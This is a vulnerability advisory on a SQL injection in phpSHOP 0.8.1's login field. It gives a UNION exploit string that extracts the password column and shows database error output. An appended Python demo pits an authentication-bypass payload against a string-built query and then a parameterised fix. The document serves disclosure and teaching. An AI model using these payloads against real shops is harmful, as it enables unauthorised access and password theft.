[+]-------------------------------[+]
Web Application: phpSHOP 0.8.1 SQL Injection
Description: SQL injection in the login.php script of phpSHOP, an open-source web e-commerce application.
[+]-------------------------------[+]
author: y2h4ck
e-mail: y2h4ck[ at ] gmail.com
page: http://y2h4ck.wordpress.com
[+]-------------------------------[+]
Vulnerable script:
  http://shop/0.8.1/?login=1&&'[EXPLOIT]

Exploit string:
  /?login=admin' +UNION+select/**/null,null,null,null,null,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null

Through the login/password input fields you can pass SQL injection strings that alter the MySQL queries phpSHOP executes. The username value is concatenated into the query without escaping, so a single quote closes the string literal and the rest of the input is parsed as SQL. A UNION injected this way must return exactly as many columns as the original SELECT * over auth_user_md5 joined with user_info, which is why the string above pads the row with null placeholders around the one column of interest.

Result:
[+]-------------------------------[+]
Database error: Invalid SQL: SELECT * from auth_user_md5,user_info WHERE auth_user_md5.username ="1==1´ select –' AND auth_user_md5.password ='d41d8cd98f00b204e9800998ecf8427e'AND auth_user_md5.password ='d41d8cd98f00b204e9800998ecf8427e'AND auth_user_md5.user_id = user_info.user_id AND user_info.address_type = 'BT'

MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1==1´ select –' AND auth_user_md5.password ='d41d8cd98f00b204e9800998ecf8427e'A' at line 1)

The error output confirms the injection point: the probe string typed into the login field appears verbatim inside the WHERE clause, and the database error is echoed back to the browser. The hash d41d8cd98f00b204e9800998ecf8427e is the MD5 of the empty string, i.e. the password field was left blank for this request.
[+]-------------------------------[+]
Version: 0.8.1
Vendor : www.phpshop.org
Date: 14/02/2008
[+]-------------------------------[+]
--
Sincerely,
Anderson Luiz Tamborim
Information Security Manager
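As an added illustration, not part of the original advisory and not phpSHOP's own code: a Python/sqlite3 reconstruction of the login query pattern visible in the error output above, showing a UNION payload succeeding against the string-built query and failing against a parameterised one. The tables, the perms column, the single-quoted username literal, the test credentials and the payload are all constructed assumptions. The real phpSHOP query uses SELECT * over both tables, so a payload against it must be padded to that full column width, which is what the advisory's run of null placeholders does; the example below uses a three-column SELECT list and a three-column UNION to keep the mechanism visible.

```python
import hashlib
import sqlite3

# Hash quoted in the advisory's error output; it is md5("") (empty password field).
ADVISORY_HASH = "d41d8cd98f00b204e9800998ecf8427e"

# Constructed payload (assumption): closes the username literal, appends a row the
# attacker controls, and comments out the password / join conditions.
BYPASS_USERNAME = "nobody' UNION SELECT 1, 'admin', 'admin' -- "


def md5_hex(text: str) -> str:
    """Hex MD5 as the auth_user_md5 table stores it (phpSHOP stores MD5 passwords)."""
    return hashlib.md5(text.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for phpSHOP's auth_user_md5 / user_info tables (constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE auth_user_md5 (user_id INTEGER, username TEXT, password TEXT, perms TEXT);
        CREATE TABLE user_info (user_id INTEGER, address_type TEXT);
        """
    )
    # Sample account (constructed): admin / s3cret, billing address row present.
    conn.execute(
        "INSERT INTO auth_user_md5 VALUES (?, ?, ?, ?)",
        (1, "admin", md5_hex("s3cret"), "admin"),
    )
    conn.execute("INSERT INTO user_info VALUES (?, ?)", (1, "BT"))
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """Builds the query by string concatenation, as the advisory's error output shows."""
    sql = (
        "SELECT auth_user_md5.user_id, auth_user_md5.username, auth_user_md5.perms "
        "FROM auth_user_md5, user_info "
        "WHERE auth_user_md5.username = '%s' "
        "AND auth_user_md5.password = '%s' "
        "AND auth_user_md5.user_id = user_info.user_id "
        "AND user_info.address_type = 'BT'" % (username, md5_hex(password))
    )
    # Attacker input is now part of the statement text; a UNION in the username
    # appends a row of the attacker's choosing and the trailing '--' discards
    # the password check, so fetchone() returns that fabricated row.
    return conn.execute(sql).fetchone()


def login_fixed(conn: sqlite3.Connection, username: str, password: str):
    """Same query with bound parameters: the input can never become SQL."""
    sql = (
        "SELECT auth_user_md5.user_id, auth_user_md5.username, auth_user_md5.perms "
        "FROM auth_user_md5, user_info "
        "WHERE auth_user_md5.username = ? "
        "AND auth_user_md5.password = ? "
        "AND auth_user_md5.user_id = user_info.user_id "
        "AND user_info.address_type = 'BT'"
    )
    return conn.execute(sql, (username, md5_hex(password))).fetchone()


if __name__ == "__main__":
    db = make_db()
    print("valid creds, vulnerable :", login_vulnerable(db, "admin", "s3cret"))
    print("UNION payload, vulnerable:", login_vulnerable(db, BYPASS_USERNAME, "anything"))
    print("UNION payload, fixed     :", login_fixed(db, BYPASS_USERNAME, "anything"))
    print("advisory hash is md5(''):", md5_hex("") == ADVISORY_HASH)
```

The vulnerable function returns the attacker-supplied row (user_id 1, username admin, perms admin) without any valid password; the parameterised version treats the whole payload as a literal username, matches nothing and returns None. Note that parameter binding fixes the injection but not the other issue visible in the advisory, the raw database error being echoed to the client, which should be logged server-side and replaced with a generic message.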